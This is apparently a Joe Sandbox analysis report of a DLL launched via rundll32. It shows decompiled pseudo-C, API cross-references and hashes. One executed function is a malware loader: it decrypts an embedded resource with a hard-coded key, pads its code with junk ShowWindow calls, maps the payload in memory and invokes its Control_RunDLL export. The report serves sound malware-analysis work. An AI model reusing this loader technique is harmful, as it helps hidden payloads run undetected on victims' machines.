0x1000ef23
0x00000000
0x00000000
0x00000000
0x1000ef23
0x1000ef0c
0x1000ef0e
0x00000000
0x00000000
0x00000000
0x1000ef0e
0x1000ef5e
0x1000ef61
0x1000ef66
0x1000ef69
0x1000ef75
0x1000ef85
0x1000ef87
0x1000efba
0x1000efbe
0x1000efc0
0x1000efc2
0x1000efc4
0x1000efc4
0x1000efc6
0x1000efc6
0x1000efca
0x1000efd3
0x1000efd3
0x00000000
0x1000efca
0x1000ef8e
0x1000ef94
0x1000ef97
0x1000ef99
0x1000efa3
0x1000efa5
0x1000efae
0x1000efae
0x1000efb1
0x1000efa7
0x1000efa7
0x1000efa7
0x1000efb6
0x1000efb6
0x00000000
0x1000efb6
0x1000ef9b
0x1000ef9e
0x00000000
0x1000ef9e
0x1000ef6e
0x1000ef70
0x00000000
0x1000ef70
0x1000ee58
0x1000ee5a
0x00000000
0x00000000
0x1000ee5c
0x1000ee5e
0x1000ee60
0x1000ee60
0x1000ee6d
0x00000000
0x1000ee6d
0x1000ee3f
0x1000ee41
0x1000ee92
0x1000ee92
0x00000000
0x1000ee92
0x1000ee45
0x1000ee46
0x00000000
0x1000ee46
0x1000edff
0x1000ee02
0x00000000
0x00000000
0x00000000
0x1000ee02
0x1000edd5
0x1000ed5a
0x1000ed61
0x1000ed66
0x1000ed6c
0x00000000
0x1000ed6c
0x1000ed5c
0x1000ed5f
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 1000EEA4

Strings

+, xrefs: 1000EDDF
-, xrefs: 1000EDD2

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction ID: 161e414dc9c41f8d3233c1f3fc7934caf211311be282c5be911a7171b8d9abf8
Opcode Fuzzy Hash: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction Fuzzy Hash: 7E91C370D042DE9EEF14CE68C8506EDBBB1EF453E0F14866AE875BB299D3309D418B51

Uniqueness

Uniqueness Score: -1.00%

Function 100052F0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E100052F0(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				signed int _t95;
				char _t97;
				signed int _t103;
				signed int _t104;
				signed int _t111;
				void* _t112;
				intOrPtr _t113;
				signed int _t114;
				signed int _t116;
				void* _t117;
				void* _t118;
				void* _t125;

				_t108 = __edx;
				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E10041E47(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t114 = _t6;
				_v20 = _t114;
				_v12 =  *(_t91 + 8) ^  *0x1004d054;
				E100052B0(__edx, _t112, _t114,  *(_t91 + 8) ^  *0x1004d054, _t114);
				E10006AD7(_a12);
				_t68 = _a4;
				_t118 = _t117 + 0x10;
				_t113 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t113 - 0xfffffffe;
					if(_t113 != 0xfffffffe) {
						_t108 = 0xfffffffe;
						E10006D5C(_t91, 0xfffffffe, _t114, 0x1004d054);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t113 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t95 = _v12;
							_t75 = _t113 + (_t113 + 2) * 2;
							_t92 =  *((intOrPtr*)(_t95 + _t75 * 4));
							_t76 = _t95 + _t75 * 4;
							_t96 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t97 = _v5;
								goto L7;
							} else {
								_t108 = _t114;
								_t77 = E10006D0C(_t96, _t114);
								_t97 = 1;
								_v5 = 1;
								_t125 = _t77;
								if(_t125 < 0) {
									_v16 = 0;
									L13:
									E100052B0(_t108, _t113, _t114, _v12, _t114);
									goto L14;
								} else {
									if(_t125 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x1004295c;
											if(__eflags != 0) {
												_t87 = E1003F6B0(__eflags, 0x1004295c);
												_t118 = _t118 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t116 =  *0x1004295c; // 0x1000544e
													 *0x1004223c(_a4, 1);
													 *_t116();
													_t114 = _v20;
													_t118 = _t118 + 8;
												}
												_t78 = _a4;
											}
										}
										_t109 = _t78;
										E10006D40(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t113;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t113) {
											_t109 = _t113;
											E10006D5C(_t80, _t113, _t114, 0x1004d054);
											_t80 = _a8;
										}
										 *((intOrPtr*)(_t80 + 0xc)) = _t92;
										E100052B0(_t109, _t113, _t114, _v12, _t114);
										E10006D24();
										asm("int3");
										_push(8);
										_push(0x1004af50);
										E100040F0();
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L29:
														_t103 =  *(_t83 + 0x1c);
														__eflags = _t103;
														if(_t103 != 0) {
															_t111 =  *(_t103 + 4);
															__eflags = _t111;
															if(_t111 == 0) {
																__eflags =  *_t103 & 0x00000010;
																if(( *_t103 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t104 =  *_t83;
																	__eflags = _t104;
																	if(_t104 != 0) {
																		 *0x1004223c(_t104);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E100054EF( *(_t83 + 0x18), _t111);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L29;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L29;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L37;
							L7:
							_t113 = _t92;
						} while (_t92 != 0xfffffffe);
						if(_t97 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L37:
			}

0x100052f0
0x100052f7
0x100052fc
0x10005302
0x1000530e
0x10005310
0x10005316
0x10005316
0x10005321
0x10005324
0x10005327
0x1000532f
0x10005334
0x10005337
0x1000533a
0x10005341
0x1000539d
0x100053a0
0x100053a8
0x100053af
0x00000000
0x100053af
0x00000000
0x10005343
0x10005343
0x10005349
0x1000534f
0x10005355
0x100053c0
0x100053c9
0x10005357
0x10005357
0x10005357
0x1000535d
0x10005360
0x10005363
0x10005366
0x10005369
0x1000536e
0x10005384
0x00000000
0x10005370
0x10005370
0x10005372
0x10005377
0x10005379
0x1000537c
0x1000537e
0x10005394
0x100053b4
0x100053b8
0x00000000
0x10005380
0x10005380
0x100053ca
0x100053cd
0x100053d3
0x100053d5
0x100053dc
0x100053e3
0x100053e8
0x100053eb
0x100053ed
0x100053ef
0x100053fc
0x10005402
0x10005404
0x10005407
0x10005407
0x1000540a
0x1000540a
0x100053dc
0x10005410
0x10005412
0x10005417
0x1000541a
0x1000541d
0x10005425
0x10005429
0x1000542e
0x1000542e
0x10005435
0x10005438
0x10005448
0x1000544d
0x1000544e
0x10005450
0x10005455
0x1000545a
0x1000545d
0x1000545f
0x10005461
0x10005467
0x10005469
0x1000546d
0x1000546f
0x10005476
0x1000548a
0x1000548a
0x1000548d
0x1000548f
0x10005491
0x10005494
0x10005496
0x100054c1
0x100054c4
0x100054c6
0x100054c9
0x100054cb
0x100054cd
0x100054d7
0x100054dd
0x100054dd
0x100054cd
0x10005498
0x10005498
0x10005498
0x10005498
0x100054a0
0x100054a5
0x100054a5
0x10005496
0x10005478
0x10005478
0x1000547f
0x00000000
0x10005481
0x10005481
0x10005488
0x00000000
0x00000000
0x10005488
0x1000547f
0x10005476
0x1000546d
0x10005467
0x100054e2
0x100054ee
0x10005382
0x00000000
0x10005382
0x10005380
0x1000537e
0x00000000
0x10005387
0x10005387
0x10005389
0x10005390
0x00000000
0x10005392
0x00000000
0x10005390
0x10005355
0x00000000

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 1000532F
__IsNonwritableInCurrentImage.LIBCMT ref: 100053E3

Strings

csm, xrefs: 100053CD

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction ID: d5b3b1a8fdddd6847bee6f7c852b1cc60a9faa064ac7a8f1db0e4c0cbd549406
Opcode Fuzzy Hash: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction Fuzzy Hash: 7D41B034E00219ABEF00CF68C884A9FBBF5EF45395F208055E914AB396D772EA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000616F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E1000616F(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_t75 = E10005A3D(_t96, __ecx, __edx, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E10005A3D(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E10004D85(_t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E10004CB7(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E10005D39(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E10012120(_t96, _t100, _t110, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x1000616f
0x1000616f
0x10006176
0x1000617f
0x1000629e
0x10006185
0x10006185
0x10006187
0x10006191
0x10006194
0x1000619a
0x100061a4
0x100061c9
0x100061ce
0x100061d3
0x1000629a
0x00000000
0x1000629b
0x100061d3
0x100061a4
0x100061d9
0x100061dc
0x100061df
0x100061e5
0x100061eb
0x100061fd
0x10006202
0x10006205
0x10006208
0x1000620b
0x1000620e
0x10006214
0x1000621a
0x1000621d
0x10006220
0x1000622f
0x10006230
0x10006230
0x10006235
0x10006248
0x1000624a
0x1000624f
0x1000625a
0x1000625c
0x1000625e
0x1000627a
0x1000627f
0x10006282
0x10006282
0x1000625a
0x1000624f
0x10006288
0x10006289
0x1000628c
0x1000628f
0x10006292
0x10006295
0x10006220
0x00000000
0x10006214
0x1000629f
0x100062a4
0x100062a8
0x100062ab
0x100062ac
0x100062ad
0x100062ae
0x100062b3
0x1000632b
0x1000632d
0x100062b5
0x100062b5
0x100062bb
0x00000000
0x100062bd
0x100062c0
0x100062c3
0x100062ca
0x100062cd
0x100062d1
0x10006303
0x10006306
0x1000630d
0x10006313
0x1000631d
0x10006326
0x10006326
0x1000631d
0x10006313
0x10006327
0x100062d3
0x100062d3
0x100062d3
0x100062d6
0x100062d6
0x100062da
0x00000000
0x00000000
0x100062de
0x100062f2
0x100062f2
0x100062e0
0x100062e0
0x100062e6
0x00000000
0x100062e8
0x100062e8
0x100062eb
0x100062f0
0x00000000
0x00000000
0x00000000
0x00000000
0x100062f0
0x100062e6
0x100062fb
0x100062fd
0x00000000
0x100062ff
0x100062ff
0x100062ff
0x00000000
0x100062fd
0x100062f6
0x100062f8
0x00000000
0x100062f8
0x00000000
0x00000000
0x00000000
0x100062c3
0x100062bb
0x1000632e
0x10006332
0x10006332

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 10006194

Strings

RCC, xrefs: 100061AE
MOC, xrefs: 100061A6

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction ID: 03575899430e62d736dc684c75bb2bfc08ffaeeadd59e420a1883adb1634af53
Opcode Fuzzy Hash: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction Fuzzy Hash: F6418B71900209EFEF02CF94CD81AEE7BB6FF48384F258199F905A7219D735A950DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10028928, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028928() {

				 *0x1004e540 = GetCommandLineA();
				 *0x1004e544 = GetCommandLineW();
				return 1;
			}

0x1002892e
0x10028939
0x10028940

APIs

GetCommandLineA.KERNEL32 ref: 10028928
GetCommandLineW.KERNEL32 ref: 10028933

Strings

H,K, xrefs: 1002892E

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CommandLine
String ID: H,K
API String ID: 3253501508-1509422812
Opcode ID: 7a35c628bcc84c1edadeb40402509ddc87dc6e8051b9adbc60d2af218fbf91b8
Instruction ID: 0277076d50cd55f33acb36392dc12be973ead0d1e0f537e4754777194e04fc0f
Opcode Fuzzy Hash: 7a35c628bcc84c1edadeb40402509ddc87dc6e8051b9adbc60d2af218fbf91b8
Instruction Fuzzy Hash: A9B092789046A08FE7108F308B9C2043FB0B32A30A3C40455D605C2370F7341440CF09

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2800 Parent PID: 2384 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	32.9%
Signature Coverage:	0%
Total number of Nodes:	650
Total number of Limit Nodes:	44

Executed Functions

Function 10001E91, Relevance: 203.4, APIs: 110, Strings: 6, Instructions: 425
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10001E91(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				char _v40;
				void* __ebp;
				signed int _t22;
				struct HINSTANCE__* _t24;
				int _t25;
				CHAR* _t29;
				void* _t33;
				void* _t35;
				int _t136;
				void* _t137;
				signed int _t138;
				signed int _t139;
				void* _t140;
				void* _t146;
				intOrPtr* _t147;
				void* _t153;
				void* _t156;
				void* _t157;
				void* _t159;
				void* _t162;
				struct HINSTANCE__* _t163;
				signed int _t173;

				_t162 = __edx;
				_t153 = __ecx;
				_t22 =  *0x1004d054; // 0xda1f8931
				_v8 = _t22 ^ _t173;
				_t24 = LoadLibraryA("MFC42.DLL"); // executed
				if(_t24 == 0) {
					L5:
					_t25 = 0;
					__eflags = 0;
				} else {
					_v20 = 0x17;
					_v36 = 0;
					_v28 = 0;
					_v16 = 0x1e55;
					_v12 = 0x409;
					_t163 = LoadLibraryA("ntdll.dll");
					_t29 = E10001A7D("LdrFindResource_U", E1000E3D0("LdrFindResource_U")); // executed
					 *0x1004db58 = GetProcAddress(_t163, _t29);
					 *0x1004db5c = GetProcAddress(_t163, "LdrAccessResource");
					_push( &_v40);
					_t33 = E1000FEF7(_t153, "3");
					_pop(_t156);
					_t35 =  *0x1004db58(0x10000000,  &_v20, _t33);
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					if(_t35 >= 0) {
						 *0x1004db5c(0x10000000, _v40,  &_v36,  &_v28);
					}
					_t136 = WriteFileGather(0, 0, 0, 0, 0);
					_t179 = _t136;
					if(_t136 != 0) {
						goto L5;
					} else {
						_t137 = E1000FEF7(_t156, L"64");
						_pop(_t157);
						_t138 = E1000FEF7(_t157, L"64");
						_t139 = E1000FEF7(_t157, L"64");
						_t159 = _t137;
						_t140 = VirtualAlloc(0, _v28, _t138 * _t139, ??); // executed
						E100045C0(_t140, _v36, _v28);
						E10001D16(_t159, _t179, "k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc", 0x22,  &_v32);
						E10001D9A(_t140, _v28,  &_v32);
						_t146 = E10002838(_t140, _v28); // executed
						_t147 = E10002765( &_v21, _t146, "Control_RunDLL"); // executed
						 *_t147(); // executed
						_t25 = MessageBoxA(0,  *0x1004d024, 0, 0);
					}
				}
				return E100037EA(_t25, _v8 ^ _t173, _t162);
			}

APIs

LoadLibraryA.KERNEL32(MFC42.DLL), ref: 10001EAF
LoadLibraryA.KERNEL32(ntdll.dll), ref: 10001EDB
_strlen.LIBCMT ref: 10001EE5

Part of subcall function 10001A7D: GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
Part of subcall function 10001A7D: VirtualAllocExNuma.KERNEL32 ref: 10001A96

GetProcAddress.KERNEL32(00000000,00000000), ref: 10001EFC
GetProcAddress.KERNEL32(00000000,LdrAccessResource), ref: 10001F09
LdrFindResource_U.NTDLL(10000000,00000017,00000000,?), ref: 10001F29
ShowWindow.USER32(00000000,00000000), ref: 10001F39
ShowWindow.USER32(00000000,00000000), ref: 10001F3D
ShowWindow.USER32(00000000,00000000), ref: 10001F41
ShowWindow.USER32(00000000,00000000), ref: 10001F45
ShowWindow.USER32(00000000,00000000), ref: 10001F49
ShowWindow.USER32(00000000,00000000), ref: 10001F4D
ShowWindow.USER32(00000000,00000000), ref: 10001F51
ShowWindow.USER32(00000000,00000000), ref: 10001F55
ShowWindow.USER32(00000000,00000000), ref: 10001F59
ShowWindow.USER32(00000000,00000000), ref: 10001F5D
ShowWindow.USER32(00000000,00000000), ref: 10001F61
ShowWindow.USER32(00000000,00000000), ref: 10001F65
ShowWindow.USER32(00000000,00000000), ref: 10001F69
ShowWindow.USER32(00000000,00000000), ref: 10001F6D
ShowWindow.USER32(00000000,00000000), ref: 10001F71
ShowWindow.USER32(00000000,00000000), ref: 10001F75
ShowWindow.USER32(00000000,00000000), ref: 10001F79
ShowWindow.USER32(00000000,00000000), ref: 10001F7D
ShowWindow.USER32(00000000,00000000), ref: 10001F81
ShowWindow.USER32(00000000,00000000), ref: 10001F85
ShowWindow.USER32(00000000,00000000), ref: 10001F89
ShowWindow.USER32(00000000,00000000), ref: 10001F8D
ShowWindow.USER32(00000000,00000000), ref: 10001F91
ShowWindow.USER32(00000000,00000000), ref: 10001F95
ShowWindow.USER32(00000000,00000000), ref: 10001F99
ShowWindow.USER32(00000000,00000000), ref: 10001F9D
ShowWindow.USER32(00000000,00000000), ref: 10001FA1
ShowWindow.USER32(00000000,00000000), ref: 10001FA5
ShowWindow.USER32(00000000,00000000), ref: 10001FA9
ShowWindow.USER32(00000000,00000000), ref: 10001FAD
ShowWindow.USER32(00000000,00000000), ref: 10001FB1
ShowWindow.USER32(00000000,00000000), ref: 10001FB5
ShowWindow.USER32(00000000,00000000), ref: 10001FB9
ShowWindow.USER32(00000000,00000000), ref: 10001FBD
ShowWindow.USER32(00000000,00000000), ref: 10001FC1
ShowWindow.USER32(00000000,00000000), ref: 10001FC5
ShowWindow.USER32(00000000,00000000), ref: 10001FC9
ShowWindow.USER32(00000000,00000000), ref: 10001FCD
ShowWindow.USER32(00000000,00000000), ref: 10001FD1
ShowWindow.USER32(00000000,00000000), ref: 10001FD5
ShowWindow.USER32(00000000,00000000), ref: 10001FD9
ShowWindow.USER32(00000000,00000000), ref: 10001FDD
ShowWindow.USER32(00000000,00000000), ref: 10001FE1
ShowWindow.USER32(00000000,00000000), ref: 10001FE5
ShowWindow.USER32(00000000,00000000), ref: 10001FE9
ShowWindow.USER32(00000000,00000000), ref: 10001FED
ShowWindow.USER32(00000000,00000000), ref: 10001FF1
ShowWindow.USER32(00000000,00000000), ref: 10001FF5
ShowWindow.USER32(00000000,00000000), ref: 10001FF9
ShowWindow.USER32(00000000,00000000), ref: 10001FFD
ShowWindow.USER32(00000000,00000000), ref: 10002001
ShowWindow.USER32(00000000,00000000), ref: 10002005
ShowWindow.USER32(00000000,00000000), ref: 10002009
